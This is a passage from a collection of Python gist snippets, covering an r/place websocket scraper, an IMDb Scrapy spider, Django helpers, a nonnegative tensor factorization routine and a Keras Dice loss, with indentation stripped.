"#222222",
"#FFA7D1",
"#E50000",
"#E59500",
"#A06A42",
"#E5D900",
"#94E044",
"#02BE01",
"#00D3DD",
"#0083C7",
"#0000EA",
"#CF6EE4",
"#820080"
]
class PlaceWebSocket(WebSocket):
def recv_frame(self):
frame = super().recv_frame()
return json.loads(frame.data.decode('utf-8'))
def db_connect(db_name):
conn = sqlite3.connect(db_name)
c = conn.cursor()
c.execute(
'''CREATE TABLE IF NOT EXISTS placements (
recieved_on INTEGER,
y INTEGER,
x INTEGER,
color INTEGER,
author TEXT
)''')
c.execute(
'''CREATE TABLE IF NOT EXISTS activity (
recieved_on INTEGER,
count INTEGER
)''')
c.execute(
'''CREATE TABLE IF NOT EXISTS starting_bitmaps (
recieved_on INTEGER,
data BLOB
)''')
c.execute('CREATE INDEX IF NOT EXISTS placements_recieved_on_idx ON placements (recieved_on)')
c.execute('CREATE INDEX IF NOT EXISTS placements_author_idx ON placements (author)')
c.execute('CREATE INDEX IF NOT EXISTS placements_color_idx ON placements (color)')
c.execute('CREATE INDEX IF NOT EXISTS activity_recieved_on_idx ON activity (recieved_on)')
conn.commit()
return c, conn
def save_bitmap(c, conn):
resp = requests.get('https://www.reddit.com/api/place/board-bitmap')
c.execute('''INSERT INTO starting_bitmaps VALUES (?, ?)''', [
int(time.time()),
resp.content
])
conn.commit()
def get_place_url():
match = None
while match is None:
resp = requests.get('https://reddit.com/r/place')
url_re = re.compile(r'"place_websocket_url": "([^,]+)"') # Forgive me, for I am a sinner
matches = re.findall(url_re, resp.content.decode('utf-8'))
if len(matches) > 0:
match = matches[0]
return match
def main():
url = get_place_url()
ws = create_connection(url, class_=PlaceWebSocket)
c, conn = db_connect('place.sqlite')
save_bitmap(c, conn)
insert_queue = 0
inserted_count = 0
max_queue_size = 100
save_frame_per = 20000
while True:
try:
frame = ws.recv_frame()
print(frame)
if frame['type'] == 'place':
c.execute('''INSERT INTO placements VALUES (?, ?, ?, ?, ?)''', [
int(time.time()),
frame['payload']['x'],
frame['payload']['y'],
frame['payload']['color'],
frame['payload']['author']
])
insert_queue += 1
inserted_count += 1
elif frame['type'] == 'activity':
c.execute('''INSERT INTO activity VALUES (?, ?)''', [
int(time.time()),
frame['payload']['count']
])
insert_queue += 1
inserted_count += 1
if insert_queue >= max_queue_size:
conn.commit()
insert_queue = 0
if inserted_count % save_frame_per == 0:
save_bitmap(c, conn)
except KeyboardInterrupt:
print('Exiting safely...')
conn.commit()
conn.close()
sys.exit()
except Exception as e:
print('Error occured: {}'.format(str(e)))
if __name__ == '__main__':
main()
```
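A read-back sketch against the `place.sqlite` file the scraper writes; column and table names follow the `CREATE TABLE` statements above, and the query itself is only an example.

```python
# Hypothetical analysis of the collected data: top authors by placement count.
import sqlite3

conn = sqlite3.connect('place.sqlite')
cur = conn.cursor()
query = ('SELECT author, COUNT(*) AS n FROM placements '
         'GROUP BY author ORDER BY n DESC LIMIT 10')
for author, n in cur.execute(query):
    print('{}: {}'.format(author, n))
conn.close()
```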
#### File: hard-gists/7698491/snippet.py
```python
import clipboard
import editor
import console
import re
import os
from new_from_gist import download_gist
class InvalidGistURLError (Exception): pass
class MultipleFilesInGistError (Exception): pass
class NoFilesInGistError (Exception): pass
class GistDownloadError (Exception): pass
def first_url_from_comments(wholetext):
first_url = ''
for line in wholetext.splitlines():
comment = re.findall(r"^#", line)
if comment:
match = re.findall(r"htt", line)
if match:
first_url = line[line.find('htt'):].split()[0]
break
return first_url
def main():
foo = editor.get_text()
gist_url = first_url_from_comments(foo)
try:
filename, content = download_gist(gist_url)
editor.replace_text(0,len(editor.get_text()),content)
#else:
#editor.make_new_file(filename, content)
except InvalidGistURLError:
console.alert('No Gist URL',
'The clipboard doesn\'t seem to contain a valid Gist URL.',
'OK')
except MultipleFilesInGistError:
console.alert('Multiple Files', 'This Gist contains multiple ' +
'Python files, which isn\'t currently supported.')
except NoFilesInGistError:
console.alert('No Python Files', 'This Gist contains no Python files.')
except GistDownloadError:
console.alert('Error', 'The Gist could not be downloaded.')
if __name__ == '__main__':
main()
```
#### File: hard-gists/76fa64ee8380763871ab/snippet.py
```python
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.selector import Selector
from scrapy.http.request import Request
from scrapy_tutorial.items import ScrapyTutorialItem
class IMDbDetailsPageSpider(CrawlSpider):
name = "imdbdetailspage"
allowed_domains = ["imdb.com"]
start_urls = [
"http://www.imdb.com/search/title?count=20&start=1&title_type=feature,tv_series"
]
rules = (
# Extract links for next pages
Rule(SgmlLinkExtractor(allow=(), restrict_xpaths=('//div[contains(@class, "leftright")][1]//a[contains(., "Next")]')), callback='parse_listings', follow=True),
)
def parse_start_url(self, response):
'''
Crawl start URLs
'''
return self.parse_listings(response)
def parse_listings(self, response):
'''
Extract data from listing pages
'''
sel = Selector(response)
films = sel.xpath('//table[contains(@class, "results")]//tr[contains(@class, "detailed")]')
for film in films:
rating = film.xpath('.//span[contains(@class, "rating-rating")]/span[contains(@class, "value")]/text()').extract()
rating = self.__normalise(rating)
rating = self.__to_float(rating)
# Get films with rating of 8.0 and above
if rating > 8:
film_url = film.xpath('.//td[contains(@class, "title")]/a/@href').extract()
film_url = self.__normalise(film_url)
film_url = self.__to_absolute_url(response.url, film_url)
yield Request(film_url, callback=self.parse_details)
def parse_details(self, response):
'''
Extract data from details pages
'''
sel = Selector(response)
film = sel.xpath('//div[@id="content-2-wide"]')
# Populate film fields
item = ScrapyTutorialItem()
item['title'] = film.xpath('.//h1/span[contains(@class, "itemprop")]/text()').extract()
item['year'] = film.xpath('.//div[@id="ratingWidget"]/p[1]/strong/following-sibling::node()').extract()
item['rating'] = film.xpath('.//span[@itemprop="ratingValue"]/text()').extract()
item['num_of_nominations'] = film.xpath('.//*[@itemprop="awards"][contains(., "nominations")]/text()').extract()
item['description'] = film.xpath('.//p[@itemprop="description"]/text()').extract()
item['poster_url'] = film.xpath('.//*[@id="img_primary"]//img/@src').extract()
item['film_url'] = response.url
item = self.__normalise_item(item, response.url)
# Get films with at least 5 award nominations
if item['num_of_nominations'] >= 5:
return item
def __normalise_item(self, item, base_url):
'''
Standardise and format item fields
'''
# Loop item fields to sanitise data and standardise data types
for key, value in vars(item).values()[0].iteritems():
item[key] = self.__normalise(item[key])
# Clean year and convert year from string to float
item['year'] = item['year'].strip('()')
item['type'] = 'Movie'
if len(item['year']) > 4:
item['type'] = 'TV Series'
item['year'] = item['year'][0:4]
item['year'] = self.__to_int(item['year'])
# Convert rating from string to float
item['rating'] = self.__to_float(item['rating'])
# Convert no. of nominations from string to int
if item['num_of_nominations']:
item['num_of_nominations'] = item['num_of_nominations'].split('&')[1]
item['num_of_nominations'] = [int(s) for s in item['num_of_nominations'].split() if s.isdigit()][0]
else:
item['num_of_nominations'] = 0
# Convert film URL from relative to absolute URL
item['film_url'] = self.__to_absolute_url(base_url, item['film_url'])
return item
def __normalise(self, value):
# Convert list to string
value = value if type(value) is not list else ' '.join(value)
# Trim leading and trailing special characters (Whitespaces, newlines, spaces, tabs, carriage returns)
value = value.strip()
return value
def __to_absolute_url(self, base_url, link):
'''
Convert relative URL to absolute URL
'''
import urlparse
link = urlparse.urljoin(base_url, link)
return link
def __to_int(self, value):
'''
Convert value to integer type
'''
try:
value = int(value)
except ValueError:
value = 0
return value
def __to_float(self, value):
'''
Convert value to float type
'''
try:
value = float(value)
except ValueError:
value = 0.0
return value
```
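The spider imports `ScrapyTutorialItem` from `scrapy_tutorial.items`. A plausible item definition matching the fields it populates might look like the sketch below; the field set is inferred from the spider, not taken from the original project.

```python
# Hypothetical scrapy_tutorial/items.py matching the fields used above.
from scrapy.item import Item, Field

class ScrapyTutorialItem(Item):
    title = Field()
    year = Field()
    type = Field()
    rating = Field()
    num_of_nominations = Field()
    description = Field()
    poster_url = Field()
    film_url = Field()
```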
#### File: hard-gists/7703144/snippet.py
```python
from contextlib import contextmanager
from django.conf import settings
from django.db import connection
@contextmanager
def no_queries_allowed():
"""This is a helper method that makes it easier during development, by
throwing an exception when any queries are made within its block. Using
an ORM, it's sometimes hard to discover what statements lead to implicit
queries. Wrapping this contextmanager around such blocks makes sure that
this cannot happen.
This is only works in debug mode, as in non-debug mode the
connection.queries list isn't available for inspection. In production,
this is a no-op.
"""
if settings.DEBUG:
queries = connection.queries
num_queries = len(queries)
yield
if settings.DEBUG:
assert num_queries == len(queries), \
"A query was made, but this was explicitly forbidden! " \
"Queries were: {}".format(queries[num_queries:])
```
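A usage sketch, assuming a Django view that works only on data fetched up front; the model access shown here is illustrative.

```python
# Hypothetical usage: any lazy ORM access inside the block trips the assert
# when DEBUG is True, exposing hidden queries during development.
from django.contrib.auth.models import User

def user_summary(user_id):
    user = User.objects.select_related().get(pk=user_id)
    with no_queries_allowed():
        # Only attribute access on already-fetched data is allowed here.
        return u'{} <{}>'.format(user.get_full_name(), user.email)
```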
#### File: hard-gists/771052/snippet.py
```python
import re
from django import forms
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
class UniqueUserEmailField(forms.EmailField):
"""
An EmailField which only is valid if no User has that email.
"""
def validate(self, value):
super(forms.EmailField, self).validate(value)
try:
User.objects.get(email = value)
raise forms.ValidationError("Email already exists")
except User.MultipleObjectsReturned:
raise forms.ValidationError("Email already exists")
except User.DoesNotExist:
pass
class ExtendedUserCreationForm(UserCreationForm):
"""
    Extends the built-in UserCreationForm in several ways:
* Adds an email field, which uses the custom UniqueUserEmailField,
that is, the form does not validate if the email address already exists
in the User table.
* The username field is generated based on the email, and isn't visible.
* first_name and last_name fields are added.
    * Saves the email, first_name and last_name data, which the default
      UserCreationForm does not persist.
"""
username = forms.CharField(required = False, max_length = 30)
email = UniqueUserEmailField(required = True, label = 'Email address')
first_name = forms.CharField(required = True, max_length = 30)
last_name = forms.CharField(required = True, max_length = 30)
def __init__(self, *args, **kwargs):
"""
Changes the order of fields, and removes the username field.
"""
super(UserCreationForm, self).__init__(*args, **kwargs)
self.fields.keyOrder = ['email', 'first_name', 'last_name',
'<PASSWORD>', '<PASSWORD>']
def __generate_username(self, email):
"""
A simple way of deriving a username from an email address.
Hat tip: http://bit.ly/eIUR5R
>>> User.objects.all().order_by('-id')[0].id
1
>>> self.__generate_username("<EMAIL>")
abcabc2
>>> self.__generate_username("<EMAIL>")
heysup3
"""
# TODO: Something more efficient?
highest_user_id = User.objects.all().order_by('-id')[0].id
leading_part_of_email = email.split('@',1)[0]
leading_part_of_email = re.sub(r'[^a-zA-Z0-9+]', '',
leading_part_of_email)
truncated_part_of_email = leading_part_of_email[:3] \
+ leading_part_of_email[-3:]
derived_username = truncated_part_of_email + str(highest_user_id+1)
return derived_username
def clean(self, *args, **kwargs):
"""
Normal cleanup + username generation.
"""
cleaned_data = super(UserCreationForm, self).clean(*args, **kwargs)
if cleaned_data.has_key('email'):
cleaned_data['username'] = self.__generate_username(
cleaned_data['email'])
return cleaned_data
def save(self, commit=True):
"""
Saves the email, first_name and last_name properties, after the normal
save behavior is complete.
"""
user = super(UserCreationForm, self).save(commit)
if user:
user.email = self.cleaned_data['email']
user.first_name = self.cleaned_data['first_name']
user.last_name = self.cleaned_data['last_name']
user.set_password(self.cleaned_data['<PASSWORD>'])
if commit:
user.save()
return user
```
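A view-level sketch of how the form might be used; the template path and redirect target are illustrative assumptions.

```python
# Hypothetical registration view for ExtendedUserCreationForm.
from django.shortcuts import redirect, render

def register(request):
    if request.method == 'POST':
        form = ExtendedUserCreationForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect('login')
    else:
        form = ExtendedUserCreationForm()
    return render(request, 'registration/register.html', {'form': form})
```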
#### File: hard-gists/7719245/snippet.py
```python
import numpy as np
from numpy import zeros, ones, diff, kron, tile, any, all, linalg
import numpy.linalg as nla
import time
from sktensor import ktensor
def find(condition):
"Return the indices where ravel(condition) is true"
res, = np.nonzero(np.ravel(condition))
return res
def normalEqComb(AtA, AtB, PassSet=None):
""" Solve many systems of linear equations using combinatorial grouping.
<NAME> and <NAME>, J. Chemometrics 2004; 18: 441-450
Parameters
----------
AtA : numpy.array, shape (n,n)
AtB : numpy.array, shape (n,k)
Returns
-------
Z : numpy.array, shape (n,k) - solution
"""
if AtB.size == 0:
Z = np.zeros([])
    elif (PassSet is None) or np.all(PassSet):
Z = nla.solve(AtA, AtB)
else:
Z = np.zeros(AtB.shape)
if PassSet.shape[1] == 1:
if np.any(PassSet):
cols = PassSet.nonzero()[0]
Z[cols] = nla.solve(AtA[np.ix_(cols, cols)], AtB[cols])
else:
#
# Both _column_group_loop() and _column_group_recursive() work well.
# Based on preliminary testing,
# _column_group_loop() is slightly faster for tiny k(<10), but
# _column_group_recursive() is faster for large k's.
#
grps = _column_group_recursive(PassSet)
for gr in grps:
cols = PassSet[:, gr[0]].nonzero()[0]
if cols.size > 0:
ix1 = np.ix_(cols, gr)
ix2 = np.ix_(cols, cols)
#
# scipy.linalg.cho_solve can be used instead of numpy.linalg.solve.
# For small n(<200), numpy.linalg.solve appears faster, whereas
# for large n(>500), scipy.linalg.cho_solve appears faster.
# Usage example of scipy.linalg.cho_solve:
# Z[ix1] = sla.cho_solve(sla.cho_factor(AtA[ix2]),AtB[ix1])
#
Z[ix1] = nla.solve(AtA[ix2], AtB[ix1])
return Z
def _column_group_recursive(B):
""" Given a binary matrix, find groups of the same columns
with a recursive strategy
Parameters
----------
B : numpy.array, True/False in each element
Returns
-------
A list of arrays - each array contain indices of columns that are the same.
"""
initial = np.arange(0, B.shape[1])
return [a for a in column_group_sub(B, 0, initial) if len(a) > 0]
def column_group_sub(B, i, cols):
vec = B[i][cols]
if len(cols) <= 1:
return [cols]
if i == (B.shape[0] - 1):
col_trues = cols[vec.nonzero()[0]]
col_falses = cols[(-vec).nonzero()[0]]
return [col_trues, col_falses]
else:
col_trues = cols[vec.nonzero()[0]]
col_falses = cols[(-vec).nonzero()[0]]
after = column_group_sub(B, i + 1, col_trues)
after.extend(column_group_sub(B, i + 1, col_falses))
return after
def nnlsm_activeset(A, B, overwrite=0, isInputProd=0, init=None):
"""
Nonnegativity Constrained Least Squares with Multiple Righthand Sides
using Active Set method
This function solves the following problem: given A and B, find X such that
minimize || AX-B ||_F^2 where X>=0 elementwise.
Reference:
<NAME> and <NAME>,
Solving Least Squares Problems,
Society for Industrial and Applied Mathematics, 1995
<NAME> and <NAME>,
Fast Algorithm for the Solution of Large-scale
Non-negativity-constrained Least Squares Problems,
J. Chemometrics 2004; 18: 441-450
Based on the Matlab version written by <NAME> (<EMAIL>)
School of Computational Science and Engineering,
Georgia Institute of Technology
Parameters
----------
A : input matrix (m x n) (by default),
or A'*A (n x n) if isInputProd==1
B : input matrix (m x k) (by default),
or A'*B (n x k) if isInputProd==1
overwrite : (optional, default:0)
if turned on, unconstrained least squares solution is computed
in the beginning
isInputProd : (optional, default:0)
if turned on, use (A'*A,A'*B) as input instead of (A,B)
init : (optional) initial value for X
Returns
-------
X : the solution (n x k)
Y : A'*A*X - A'*B where X is the solution (n x k)
"""
if isInputProd:
AtA = A
AtB = B
else:
AtA = A.T.dot(A)
AtB = A.T.dot(B)
n, k = AtB.shape
MAX_ITER = n * 5
# set initial feasible solution
if overwrite:
X = normalEqComb(AtA, AtB)
PassSet = (X > 0).copy()
NotOptSet = any(X < 0)
elif init is not None:
X = init
X[X < 0] = 0
PassSet = (X > 0).copy()
NotOptSet = ones((1, k), dtype=np.bool)
else:
X = zeros((n, k))
PassSet = zeros((n, k), dtype=np.bool)
NotOptSet = ones((1, k), dtype=np.bool)
Y = zeros((n, k))
if (~NotOptSet).any():
Y[:, ~NotOptSet] = AtA.dot(X[:, ~NotOptSet]) - AtB[:, ~NotOptSet]
NotOptCols = find(NotOptSet)
bigIter = 0
while NotOptCols.shape[0] > 0:
bigIter = bigIter + 1
# set max_iter for ill-conditioned (numerically unstable) case
if ((MAX_ITER > 0) & (bigIter > MAX_ITER)):
break
Z = normalEqComb(AtA, AtB[:, NotOptCols], PassSet[:, NotOptCols])
Z[abs(Z) < 1e-12] = 0 # for numerical stability.
InfeaSubSet = Z < 0
InfeaSubCols = find(any(InfeaSubSet, axis=0))
FeaSubCols = find(all(~InfeaSubSet, axis=0))
if InfeaSubCols.shape[0] > 0: # for infeasible cols
ZInfea = Z[:, InfeaSubCols]
InfeaCols = NotOptCols[InfeaSubCols]
Alpha = zeros((n, InfeaSubCols.shape[0]))
Alpha[:] = np.inf
ij = np.argwhere(InfeaSubSet[:, InfeaSubCols])
i = ij[:, 0]
j = ij[:, 1]
InfeaSubIx = np.ravel_multi_index((i, j), Alpha.shape)
if InfeaCols.shape[0] == 1:
InfeaIx = np.ravel_multi_index((i,
InfeaCols * ones((len(j), 1),
dtype=int)),
(n, k))
else:
InfeaIx = np.ravel_multi_index((i, InfeaCols[j]), (n, k))
Alpha.ravel()[InfeaSubIx] = X.ravel()[InfeaIx] / \
(X.ravel()[InfeaIx] - ZInfea.ravel()[InfeaSubIx])
minVal, minIx = np.min(Alpha, axis=0), np.argmin(Alpha, axis=0)
Alpha[:, :] = kron(ones((n, 1)), minVal)
X[:, InfeaCols] = X[:, InfeaCols] + \
Alpha * (ZInfea - X[:, InfeaCols])
IxToActive = np.ravel_multi_index((minIx, InfeaCols), (n, k))
X.ravel()[IxToActive] = 0
PassSet.ravel()[IxToActive] = False
if FeaSubCols.shape[0] > 0: # for feasible cols
FeaCols = NotOptCols[FeaSubCols]
X[:, FeaCols] = Z[:, FeaSubCols]
Y[:, FeaCols] = AtA.dot(X[:, FeaCols]) - AtB[:, FeaCols]
Y[abs(Y) < 1e-12] = 0 # for numerical stability.
NotOptSubSet = (Y[:, FeaCols] < 0) & ~PassSet[:, FeaCols]
NewOptCols = FeaCols[all(~NotOptSubSet, axis=0)]
UpdateNotOptCols = FeaCols[any(NotOptSubSet, axis=0)]
if UpdateNotOptCols.shape[0] > 0:
minIx = np.argmin(Y[:, UpdateNotOptCols] * \
~PassSet[:, UpdateNotOptCols], axis=0)
idx = np.ravel_multi_index((minIx, UpdateNotOptCols), (n, k))
PassSet.ravel()[idx] = True
NotOptSet.T[NewOptCols] = False
NotOptCols = find(NotOptSet)
return X, Y
def nnlsm_blockpivot(A, B, isInputProd=0, init=None):
"""
Nonnegativity Constrained Least Squares with Multiple Righthand Sides
using Block Principal Pivoting method
This function solves the following problem: given A and B, find X such that
minimize || AX-B ||_F^2 where X>=0 elementwise.
Reference:
<NAME> and <NAME>. Fast Nonnegative Matrix Factorization:
An Activeset-like Method and Comparisons.
SIAM Journal on Scientific Computing, 33(6), pp. 3261-3281, 2011.
Based on the Matlab version written by <NAME> (<EMAIL>)
School of Computational Science and Engineering,
Georgia Institute of Technology
Parameters
----------
A : input matrix (m x n) (by default),
or A'*A (n x n) if isInputProd==1
B : input matrix (m x k) (by default),
or A'*B (n x k) if isInputProd==1
overwrite : (optional, default:0)
if turned on, unconstrained least squares solution is computed
in the beginning
isInputProd : (optional, default:0)
if turned on, use (A'*A,A'*B) as input instead of (A,B)
init : (optional) initial value for X
Returns
-------
X : the solution (n x k)
Y : A'*A*X - A'*B where X is the solution (n x k)
"""
if isInputProd:
AtA = A
AtB = B
else:
AtA = A.T.dot(A)
AtB = A.T.dot(B)
n, k = AtB.shape
MAX_BIG_ITER = n * 5
# set initial feasible solution
X = zeros((n, k))
if init is None:
Y = - AtB
PassiveSet = zeros((n, k), dtype=np.bool)
else:
PassiveSet = (init > 0).copy()
X = normalEqComb(AtA, AtB, PassiveSet)
Y = AtA.dot(X) - AtB
# parameters
pbar = 3
P = zeros((1, k))
P[:] = pbar
Ninf = zeros((1, k))
Ninf[:] = n + 1
NonOptSet = (Y < 0) & ~PassiveSet
InfeaSet = (X < 0) & PassiveSet
NotGood = (np.sum(NonOptSet, axis=0) + \
np.sum(InfeaSet, axis=0))[np.newaxis, :]
NotOptCols = NotGood > 0
bigIter = 0
while find(NotOptCols).shape[0] > 0:
bigIter = bigIter + 1
# set max_iter for ill-conditioned (numerically unstable) case
if ((MAX_BIG_ITER > 0) & (bigIter > MAX_BIG_ITER)):
break
Cols1 = NotOptCols & (NotGood < Ninf)
Cols2 = NotOptCols & (NotGood >= Ninf) & (P >= 1)
Cols3Ix = find(NotOptCols & ~Cols1 & ~Cols2)
if find(Cols1).shape[0] > 0:
P[Cols1] = pbar
NotGood[Cols1]
Ninf[Cols1] = NotGood[Cols1]
PassiveSet[NonOptSet & tile(Cols1, (n, 1))] = True
PassiveSet[InfeaSet & tile(Cols1, (n, 1))] = False
if find(Cols2).shape[0] > 0:
P[Cols2] = P[Cols2] - 1
PassiveSet[NonOptSet & tile(Cols2, (n, 1))] = True
PassiveSet[InfeaSet & tile(Cols2, (n, 1))] = False
if Cols3Ix.shape[0] > 0:
for i in range(Cols3Ix.shape[0]):
Ix = Cols3Ix[i]
toChange = np.max(find(NonOptSet[:, Ix] | InfeaSet[:, Ix]))
if PassiveSet[toChange, Ix]:
PassiveSet[toChange, Ix] = False
else:
PassiveSet[toChange, Ix] = True
Z = normalEqComb(AtA, AtB[:, NotOptCols.flatten()],
PassiveSet[:, NotOptCols.flatten()])
X[:, NotOptCols.flatten()] = Z[:]
X[abs(X) < 1e-12] = 0 # for numerical stability.
Y[:, NotOptCols.flatten()] = AtA.dot(X[:, NotOptCols.flatten()]) - \
AtB[:, NotOptCols.flatten()]
Y[abs(Y) < 1e-12] = 0 # for numerical stability.
# check optimality
NotOptMask = tile(NotOptCols, (n, 1))
NonOptSet = NotOptMask & (Y < 0) & ~PassiveSet
InfeaSet = NotOptMask & (X < 0) & PassiveSet
NotGood = (np.sum(NonOptSet, axis=0) +
np.sum(InfeaSet, axis=0))[np.newaxis, :]
NotOptCols = NotGood > 0
return X, Y
def getGradient(X, F, nWay, r):
grad = []
for k in range(nWay):
ways = range(nWay)
ways.remove(k)
XF = X.uttkrp(F, k)
# Compute the inner-product matrix
FF = ones((r, r))
for i in ways:
FF = FF * (F[i].T.dot(F[i]))
grad.append(F[k].dot(FF) - XF)
return grad
def getProjGradient(X, F, nWay, r):
pGrad = []
for k in range(nWay):
ways = range(nWay)
ways.remove(k)
XF = X.uttkrp(F, k)
# Compute the inner-product matrix
FF = ones((r, r))
for i in ways:
FF = FF * (F[i].T.dot(F[i]))
grad = F[k].dot(FF) - XF
grad[~((grad < 0) | (F[k] > 0))] = 0.
pGrad.append(grad)
return pGrad
class anls_asgroup(object):
def initializer(self, X, F, nWay, orderWays):
F[orderWays[0]] = zeros(F[orderWays[0]].shape)
FF = []
for k in range(nWay):
FF.append((F[k].T.dot(F[k])))
return F, FF
def iterSolver(self, X, F, FF_init, nWay, r, orderWays):
# solve NNLS problems for each factor
for k in range(nWay):
curWay = orderWays[k]
ways = range(nWay)
ways.remove(curWay)
XF = X.uttkrp(F, curWay)
# Compute the inner-product matrix
FF = ones((r, r))
for i in ways:
FF = FF * FF_init[i] # (F[i].T.dot(F[i]))
ow = 0
Fthis, temp = nnlsm_activeset(FF, XF.T, ow, 1, F[curWay].T)
F[curWay] = Fthis.T
FF_init[curWay] = (F[curWay].T.dot(F[curWay]))
return F, FF_init
class anls_bpp(object):
def initializer(self, X, F, nWay, orderWays):
F[orderWays[0]] = zeros(F[orderWays[0]].shape)
FF = []
for k in range(nWay):
FF.append((F[k].T.dot(F[k])))
return F, FF
def iterSolver(self, X, F, FF_init, nWay, r, orderWays):
for k in range(nWay):
curWay = orderWays[k]
ways = range(nWay)
ways.remove(curWay)
XF = X.uttkrp(F, curWay)
# Compute the inner-product matrix
FF = ones((r, r))
for i in ways:
FF = FF * FF_init[i] # (F[i].T.dot(F[i]))
Fthis, temp = nnlsm_blockpivot(FF, XF.T, 1, F[curWay].T)
F[curWay] = Fthis.T
FF_init[curWay] = (F[curWay].T.dot(F[curWay]))
return F, FF_init
def getStopCriterion(pGrad, nWay, nr_grad_all):
retVal = np.sum(np.linalg.norm(pGrad[i], 'fro') ** 2
for i in range(nWay))
return np.sqrt(retVal) / nr_grad_all
def getRelError(X, F_kten, nWay, nr_X):
error = nr_X ** 2 + F_kten.norm() ** 2 - 2 * F_kten.innerprod(X)
return np.sqrt(max(error, 0)) / nr_X
def nonnegative_tensor_factorization(X, r, method='anls_bpp',
tol=1e-4, stop_criterion=1,
min_iter=20, max_iter=200, max_time=1e6,
init=None, orderWays=None):
"""
Nonnegative Tensor Factorization (Canonical Decomposition / PARAFAC)
Based on the Matlab version written by <NAME> (<EMAIL>)
School of Computational Science and Engineering,
Georgia Institute of Technology
This software implements nonnegativity-constrained low-rank approximation
    of tensors in the PARAFAC model. Assuming that a k-way tensor X and a target
    rank r are given, this software seeks F1, ... , Fk by solving the following
problem:
minimize
|| X- sum_(j=1)^r (F1_j o F2_j o ... o Fk_j) ||_F^2 +
G(F1, ... , Fk) + H(F1, ..., Fk)
where
G(F1, ... , Fk) = sum_(i=1)^k ( alpha_i * ||Fi||_F^2 ),
H(F1, ... , Fk) = sum_(i=1)^k ( beta_i sum_(j=1)^n || Fi_j ||_1^2 ).
such that
Fi >= 0 for all i.
To use this software, it is necessary to first install scikit_tensor.
Reference:
Fast Nonnegative Tensor Factorization with an Active-set-like Method.
<NAME> and <NAME>.
In High-Performance Scientific Computing: Algorithms and Applications,
Springer, 2012, pp. 311-326.
Parameters
----------
    X : 'tensor' object of scikit_tensor
Input data tensor.
r : int
Target low-rank.
method : string, optional
Algorithm for solving NMF. One of the following values:
'anls_bpp' 'anls_asgroup' 'hals' 'mu'
See above paper (and references therein) for the details
of these algorithms.
Default is 'anls_bpp'.
tol : float, optional
Stopping tolerance. Default is 1e-4.
If you want to obtain a more accurate solution,
decrease TOL and increase MAX_ITER at the same time.
min_iter : int, optional
Minimum number of iterations. Default is 20.
max_iter : int, optional
Maximum number of iterations. Default is 200.
    init : A list that contains initial values for the factors Fi.
        See the examples below for how to set it.
Returns
-------
F : a 'ktensor' object that represent a factorized form of a tensor.
Examples
--------
F = nonnegative_tensor_factorization(X, 5)
F = nonnegative_tensor_factorization(X, 10, tol=1e-3)
F = nonnegative_tensor_factorization(X, 7, init=Finit, tol=1e-5)
"""
nWay = len(X.shape)
if orderWays is None:
orderWays = np.arange(nWay)
# set initial values
if init is not None:
F_cell = init
else:
Finit = [np.random.rand(X.shape[i], r) for i in range(nWay)]
F_cell = Finit
grad = getGradient(X, F_cell, nWay, r)
nr_X = X.norm()
nr_grad_all = np.sqrt(np.sum(np.linalg.norm(grad[i], 'fro') ** 2
for i in range(nWay)))
if method == "anls_bpp":
method = anls_bpp()
elif method == "anls_asgroup":
method = anls_asgroup()
else:
raise Exception("Unknown method")
# Execute initializer
F_cell, FF_init = method.initializer(X, F_cell, nWay, orderWays)
tStart = time.time()
if stop_criterion == 2:
F_kten = ktensor(F_cell)
rel_Error = getRelError(X, ktensor(F_cell), nWay, nr_X)
if stop_criterion == 1:
pGrad = getProjGradient(X, F_cell, nWay, r)
SC_PGRAD = getStopCriterion(pGrad, nWay, nr_grad_all)
# main iterations
for iteration in range(max_iter):
cntu = True
F_cell, FF_init = method.iterSolver(X, F_cell,
FF_init, nWay, r, orderWays)
F_kten = ktensor(F_cell)
if iteration >= min_iter:
if time.time() - tStart > max_time:
cntu = False
else:
if stop_criterion == 1:
pGrad = getProjGradient(X, F_cell, nWay, r)
SC_PGRAD = getStopCriterion(pGrad, nWay, nr_grad_all)
if SC_PGRAD < tol:
cntu = False
elif stop_criterion == 2:
prev_rel_Error = rel_Error
rel_Error = getRelError(X, F_kten, nWay, nr_X)
SC_DIFF = np.abs(prev_rel_Error - rel_Error)
if SC_DIFF < tol:
cntu = False
else:
rel_Error = getRelError(X, F_kten, nWay, nr_X)
if rel_Error < 1:
cntu = False
if not cntu:
break
return F_kten
def main():
from numpy.random import rand
# -----------------------------------------------
# Creating a synthetic 4th-order tensor
# -----------------------------------------------
N1 = 20
N2 = 25
N3 = 30
N4 = 30
R = 10
# Random initialization
np.random.seed(42)
A_org = np.random.rand(N1, R)
A_org[A_org < 0.4] = 0
B_org = rand(N2, R)
B_org[B_org < 0.4] = 0
C_org = rand(N3, R)
C_org[C_org < 0.4] = 0
D_org = rand(N4, R)
D_org[D_org < 0.4] = 0
X_ks = ktensor([A_org, B_org, C_org, D_org])
X = X_ks.totensor()
# -----------------------------------------------
# Tentative initial values
# -----------------------------------------------
A0 = np.random.rand(N1, R)
B0 = np.random.rand(N2, R)
C0 = np.random.rand(N3, R)
D0 = np.random.rand(N4, R)
Finit = [A0, B0, C0, D0]
# -----------------------------------------------
# Uncomment only one of the following
# -----------------------------------------------
X_approx_ks = nonnegative_tensor_factorization(X, R)
# X_approx_ks = nonnegative_tensor_factorization(X, R,
# min_iter=5, max_iter=20)
#
# X_approx_ks = nonnegative_tensor_factorization(X, R,
# method='anls_asgroup')
#
# X_approx_ks = nonnegative_tensor_factorization(X, R,
# tol=1e-7, max_iter=300)
#
# X_approx_ks = nonnegative_tensor_factorization(X, R,
# init=Finit)
# -----------------------------------------------
# Approximation Error
# -----------------------------------------------
X_approx = X_approx_ks.totensor()
X_err = (X - X_approx).norm() / X.norm()
print "Error:", X_err
if __name__ == "__main__":
main()
```
#### File: hard-gists/7793e2058c5c9dacb5212c0ac0b18a8a/snippet.py
```python
from keras import backend as K
def dice_coef(y_true, y_pred, smooth=1):
"""
Dice = (2*|X & Y|)/ (|X|+ |Y|)
= 2*sum(|A*B|)/(sum(A^2)+sum(B^2))
ref: https://arxiv.org/pdf/1606.04797v1.pdf
"""
intersection = K.sum(K.abs(y_true * y_pred), axis=-1)
return (2. * intersection + smooth) / (K.sum(K.square(y_true),-1) + K.sum(K.square(y_pred),-1) + smooth)
def dice_coef_loss(y_true, y_pred):
return 1-dice_coef(y_true, y_pred)
# Test
